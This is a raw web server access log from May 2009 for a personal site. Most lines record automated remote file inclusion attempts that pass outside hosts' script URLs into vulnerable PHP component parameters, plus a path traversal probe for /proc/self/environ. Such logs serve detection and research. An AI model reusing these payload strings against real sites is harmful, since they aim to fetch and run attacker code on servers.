64.157.4.42 - - [19/May/2009:10:21:17 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
81.177.9.40 - - [19/May/2009:10:21:25 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/data/log.txt??? HTTP/1.0" 200 42064 "-" "libwww-perl/5.805" "www.dmulk.com"
64.157.4.42 - - [19/May/2009:10:21:35 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
222.122.26.5 - - [19/May/2009:10:21:39 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.26.5 - - [19/May/2009:10:21:40 -0700] "GET /logs/access_090405.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.26.5 - - [19/May/2009:10:21:40 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.110.19.178 - - [19/May/2009:10:22:00 -0700] "GET /?path%5Bdocroot%5D=http://www.tkcchoir.org/xml/pw.txt?? HTTP/1.0" 500 292 "-" "libwww-perl/5.805" "www.dmulk.com"
122.153.212.195 - - [19/May/2009:10:22:02 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.55.106.131 - - [19/May/2009:10:22:03 -0700] "GET /xceopgmfkaabhgfgl.php HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
122.153.212.195 - - [19/May/2009:10:22:07 -0700] "GET /logs/access_080621.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.153.212.195 - - [19/May/2009:10:22:12 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.151.224.239 - - [19/May/2009:10:22:46 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.byufolkdance.com/foto.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "www.dmulk.com"
211.110.19.178 - - [19/May/2009:10:22:47 -0700] "GET /include/print_category.php?setup[use_category]=1&dir=http://jasek1.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.110.19.178 - - [19/May/2009:10:22:47 -0700] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://jasek1.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.110.19.178 - - [19/May/2009:10:22:47 -0700] "GET /logs/access_080401.log//include/print_category.php?setup[use_category]=1&dir=http://jasek1.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.110.19.178 - - [19/May/2009:10:22:48 -0700] "GET /logs/access_081112.log//?path%5Bdocroot%5D=http://www.tkcchoir.org/xml/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
122.153.212.195 - - [19/May/2009:10:23:33 -0700] "GET /logs/access_080530.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.94.56.98 - - [19/May/2009:10:23:59 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT%5BLANGUAGES_DIR%5D=http://www.depo.org.pk/images/21/ts?? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
72.52.230.168 - - [19/May/2009:10:24:06 -0700] "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.52.230.168 - - [19/May/2009:10:24:06 -0700] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.52.230.168 - - [19/May/2009:10:24:06 -0700] "GET /logs/access_090120.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.52.230.168 - - [19/May/2009:10:24:06 -0700] "GET /logs/access_090117.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.108.64.88 - - [19/May/2009:10:24:09 -0700] "GET /logs/access_080222.log///?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/data/log.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.64.88 - - [19/May/2009:10:24:10 -0700] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/data/log.txt? HTTP/1.1" 200 100197 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.64.88 - - [19/May/2009:10:24:12 -0700] "GET /logs/access_080222.log///?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/data/log.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.64.88 - - [19/May/2009:10:24:13 -0700] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/data/log.txt? HTTP/1.1" 200 100197 "-" "libwww-perl/5.812" "www.dmulk.com"
211.110.19.178 - - [19/May/2009:10:24:24 -0700] "GET /logs/access_080720.log//include/print_category.php?setup[use_category]=1&dir=http://jasek1.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.191.103.144 - - [19/May/2009:10:24:28 -0700] "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.191.103.144 - - [19/May/2009:10:24:28 -0700] "GET /logs/access_090120.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.191.103.144 - - [19/May/2009:10:24:28 -0700] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.191.103.144 - - [19/May/2009:10:24:33 -0700] "GET /logs/access_090117.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
220.79.47.122 - - [19/May/2009:10:24:36 -0700] "GET /logs/access_090408.log%20%20//administrator/components/com_virtuemart/export.php?mosconfig_absolute_path=http://www.sexclusiv.eu/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.108.64.88 - - [19/May/2009:10:24:38 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/data/log.txt? HTTP/1.1" 200 42073 "-" "libwww-perl/5.812" "www.dmulk.com"
62.141.54.240 - - [19/May/2009:10:24:39 -0700] "GET /http://little-blue-dogs.de/style/idx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.64.88 - - [19/May/2009:10:24:39 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/data/log.txt? HTTP/1.1" 200 42073 "-" "libwww-perl/5.812" "www.dmulk.com"
218.27.203.107 - - [19/May/2009:10:24:47 -0700] "GET /logs/access_081201.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [19/May/2009:10:24:54 -0700] "GET /logs/access_090117.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.135.14 - - [19/May/2009:10:25:21 -0700] "GET /logs/access_080918.log//amember/plugins/payment/secpay/secpay.inc.php?config%5broot_dir%5d=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.135.14 - - [19/May/2009:10:25:22 -0700] "GET /amember/plugins/payment/secpay/secpay.inc.php?config%5broot_dir%5d=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.135.14 - - [19/May/2009:10:25:22 -0700] "GET /logs//amember/plugins/payment/secpay/secpay.inc.php?config%5broot_dir%5d=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.110.19.178 - - [19/May/2009:10:25:42 -0700] "GET /logs/access_081123.log//?path%5Bdocroot%5D=http://www.tkcchoir.org/xml/roxx.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.110.19.178 - - [19/May/2009:10:25:43 -0700] "GET /?path%5Bdocroot%5D=http://www.tkcchoir.org/xml/roxx.jpg??? HTTP/1.1" 200 42070 "-" "libwww-perl/5.805" "www.dmulk.com"
216.119.103.12 - - [19/May/2009:10:25:43 -0700] "GET /logs/access_080713.log//atom.php5?page=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.119.103.12 - - [19/May/2009:10:25:43 -0700] "GET /atom.php5?page=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.119.103.12 - - [19/May/2009:10:25:43 -0700] "GET /logs//atom.php5?page=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.110.19.178 - - [19/May/2009:10:25:44 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.tkcchoir.org/xml/roxx.jpg??? HTTP/1.1" 200 100196 "-" "libwww-perl/5.805" "www.dmulk.com"
216.119.103.12 - - [19/May/2009:10:25:44 -0700] "GET /logs/access_081221.log//atom.php5?page=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.64.88 - - [19/May/2009:10:25:46 -0700] "GET /logs/access_080310.log///?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/data/log.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.64.88 - - [19/May/2009:10:25:50 -0700] "GET /logs/access_080310.log///?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/data/log.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
193.111.226.242 - - [19/May/2009:10:26:00 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.laubrotel.com/cgi/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
87.106.135.14 - - [19/May/2009:10:26:02 -0700] "GET /logs/access_080713.log//atom.php5?page=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.135.14 - - [19/May/2009:10:26:02 -0700] "GET /atom.php5?page=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.135.14 - - [19/May/2009:10:26:03 -0700] "GET /logs//atom.php5?page=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.135.14 - - [19/May/2009:10:26:08 -0700] "GET /logs/access_081221.log//atom.php5?page=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
196.40.83.75 - - [19/May/2009:10:26:14 -0700] "GET /citywriter/head.php?path=http://svision-online.de/mgfi//administrator/components/com_babackup/classes/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
196.40.83.75 - - [19/May/2009:10:26:14 -0700] "GET /logs//citywriter/head.php?path=http://svision-online.de/mgfi//administrator/components/com_babackup/classes/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
196.40.83.75 - - [19/May/2009:10:26:14 -0700] "GET /logs/access_080806.log//citywriter/head.php?path=http://svision-online.de/mgfi//administrator/components/com_babackup/classes/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.186.1.54 - - [19/May/2009:10:26:16 -0700] "GET /logs/access_080902.log//osticket/include/main.php?config[search_disp]=true&include_dir=http://largeface.com/gnuboard4/gnus/id4.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
89.186.1.54 - - [19/May/2009:10:26:16 -0700] "GET /logs//osticket/include/main.php?config[search_disp]=true&include_dir=http://largeface.com/gnuboard4/gnus/id4.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
89.186.1.54 - - [19/May/2009:10:26:16 -0700] "GET /osticket/include/main.php?config[search_disp]=true&include_dir=http://largeface.com/gnuboard4/gnus/id4.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
196.40.83.75 - - [19/May/2009:10:26:18 -0700] "GET /logs/access_090226.log//citywriter/head.php?path=http://svision-online.de/mgfi//administrator/components/com_babackup/classes/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.26.5 - - [19/May/2009:10:26:31 -0700] "GET /logs/access_090512.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.18.76.16 - - [19/May/2009:10:26:34 -0700] "GET /logs/access_080903.log//atom.php5?page=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.18.76.16 - - [19/May/2009:10:26:35 -0700] "GET /atom.php5?page=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.18.76.16 - - [19/May/2009:10:26:35 -0700] "GET /logs//atom.php5?page=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.18.76.16 - - [19/May/2009:10:26:35 -0700] "GET /logs/access_080713.log//atom.php5?page=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.122.26.5 - - [19/May/2009:10:26:45 -0700] "GET /logs/access_090507.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.16.54 - - [19/May/2009:10:26:48 -0700] "GET /logs//?_zb_path=http://ssdnb.net/bbs/data/list??? HTTP/1.1" 200 100196 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
64.157.4.43 - - [19/May/2009:10:26:48 -0700] "HEAD /blog/wp-cron.php?check=0e2d9f8f249ca15a02717d213606e9a2 HTTP/1.0" 200 0 "-" "WordPress/2.7.1" "dmulk.com"
62.141.54.240 - - [19/May/2009:10:27:04 -0700] "GET /logs/access_080518.log/http://little-blue-dogs.de/style/idx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.141.54.240 - - [19/May/2009:10:27:04 -0700] "GET /http://little-blue-dogs.de/style/idx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.141.54.240 - - [19/May/2009:10:27:05 -0700] "GET /logs/http://little-blue-dogs.de/style/idx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.157.4.43 - - [19/May/2009:10:27:06 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
64.157.4.43 - - [19/May/2009:10:27:20 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
211.110.19.178 - - [19/May/2009:10:27:31 -0700] "GET /logs/access_081112.log//?path%5Bdocroot%5D=http://www.tkcchoir.org/xml/roxx.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.38.16.54 - - [19/May/2009:10:27:43 -0700] "GET /?_zb_path=http://ssdnb.net/bbs/data/list??? HTTP/1.1" 200 42058 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
82.194.87.219 - - [19/May/2009:10:27:43 -0700] "GET /logs///components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.laubrotel.com/cgi/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.dmulk.com"
201.76.47.224 - - [19/May/2009:10:27:43 -0700] "GET /logs/access_080614.log/modules/vwar/admin/admin.php?vwar_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.76.47.224 - - [19/May/2009:10:27:43 -0700] "GET /modules/vwar/admin/admin.php?vwar_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.76.47.224 - - [19/May/2009:10:27:43 -0700] "GET /logs/modules/vwar/admin/admin.php?vwar_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.206.183.148 - - [19/May/2009:10:27:45 -0700] "GET /errors.php?error=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.206.183.148 - - [19/May/2009:10:27:45 -0700] "GET /logs/errors.php?error=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.206.183.148 - - [19/May/2009:10:27:45 -0700] "GET /logs/access_081116.log/errors.php?error=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.206.183.148 - - [19/May/2009:10:27:45 -0700] "GET /logs/access_090112.log/errors.php?error=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
201.76.47.224 - - [19/May/2009:10:27:51 -0700] "GET /logs/access_081116.log/modules/vwar/admin/admin.php?vwar_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
122.153.212.195 - - [19/May/2009:10:27:52 -0700] "GET /logs/access_080621.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.206.183.148 - - [19/May/2009:10:27:53 -0700] "GET /errors.php?error=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.206.183.148 - - [19/May/2009:10:27:53 -0700] "GET /logs/errors.php?error=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.206.183.148 - - [19/May/2009:10:27:53 -0700] "GET /logs/access_081116.log%20%20/errors.php?error=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.206.183.148 - - [19/May/2009:10:27:53 -0700] "GET /logs/access_090112.log%20%20/errors.php?error=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
81.177.9.40 - - [19/May/2009:10:27:53 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/data/log.txt??? HTTP/1.1" 200 42079 "-" "libwww-perl/5.805" "www.dmulk.com"
121.165.73.157 - - [19/May/2009:10:27:54 -0700] "GET /logs/access_081116.log/errors.php?error=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [19/May/2009:10:27:54 -0700] "GET /errors.php?error=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [19/May/2009:10:27:54 -0700] "GET /logs/errors.php?error=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [19/May/2009:10:27:54 -0700] "GET /logs/access_090112.log/errors.php?error=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.237.82.158 - - [19/May/2009:10:27:59 -0700] "GET /errors.php?error=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.237.82.158 - - [19/May/2009:10:27:59 -0700] "GET /logs/errors.php?error=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.237.82.158 - - [19/May/2009:10:28:00 -0700] "GET /logs/access_081116.log/errors.php?error=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.237.82.158 - - [19/May/2009:10:28:02 -0700] "GET /logs/access_090112.log/errors.php?error=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.52.230.168 - - [19/May/2009:10:28:07 -0700] "GET /logs/access_090120.log%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.153.212.195 - - [19/May/2009:10:28:07 -0700] "GET /logs/access_080530.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
81.177.9.40 - - [19/May/2009:10:28:08 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/data/log.txt??? HTTP/1.1" 200 42079 "-" "libwww-perl/5.805" "www.dmulk.com"
72.52.230.168 - - [19/May/2009:10:28:13 -0700] "GET /logs/access_090117.log%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [19/May/2009:10:28:14 -0700] "GET /errors.php?error=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [19/May/2009:10:28:14 -0700] "GET /logs/access_090112.log%20%20/errors.php?error=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [19/May/2009:10:28:14 -0700] "GET /logs/errors.php?error=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [19/May/2009:10:28:14 -0700] "GET /logs/access_081116.log%20%20/errors.php?error=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.227.96.166 - - [19/May/2009:10:28:17 -0700] "GET /logs/Neos_Chronos/header.php?base_folder=http://www.atidgourmet.cl/greybox/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.227.96.166 - - [19/May/2009:10:28:17 -0700] "GET /logs/access_080224.log/Neos_Chronos/header.php?base_folder=http://www.atidgourmet.cl/greybox/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.227.96.166 - - [19/May/2009:10:28:17 -0700] "GET /Neos_Chronos/header.php?base_folder=http://www.atidgourmet.cl/greybox/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.227.96.166 - - [19/May/2009:10:28:19 -0700] "GET /Neos_Chronos/header.php?base_folder=http://www.atidgourmet.cl/greybox/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.227.96.166 - - [19/May/2009:10:28:19 -0700] "GET /logs/access_080224.log/Neos_Chronos/header.php?base_folder=http://www.atidgourmet.cl/greybox/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.227.96.166 - - [19/May/2009:10:28:19 -0700] "GET /logs/Neos_Chronos/header.php?base_folder=http://www.atidgourmet.cl/greybox/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.227.96.166 - - [19/May/2009:10:28:19 -0700] "GET /logs/access_080102.log/Neos_Chronos/header.php?base_folder=http://www.atidgourmet.cl/greybox/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.237.82.158 - - [19/May/2009:10:28:25 -0700] "GET /errors.php?error=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.237.82.158 - - [19/May/2009:10:28:25 -0700] "GET /logs/errors.php?error=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.237.82.158 - - [19/May/2009:10:28:25 -0700] "GET /logs/access_090112.log%20%20/errors.php?error=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.237.82.158 - - [19/May/2009:10:28:28 -0700] "GET /logs/access_081116.log%20%20/errors.php?error=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.206.183.148 - - [19/May/2009:10:28:37 -0700] "GET /errors.php?error=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.206.183.148 - - [19/May/2009:10:28:37 -0700] "GET /logs/errors.php?error=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.206.183.148 - - [19/May/2009:10:28:37 -0700] "GET /logs/access_081116.log/errors.php?error=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.206.183.148 - - [19/May/2009:10:28:38 -0700] "GET /logs/access_090112.log/errors.php?error=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.191.103.144 - - [19/May/2009:10:28:40 -0700] "GET /logs/access_090120.log%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
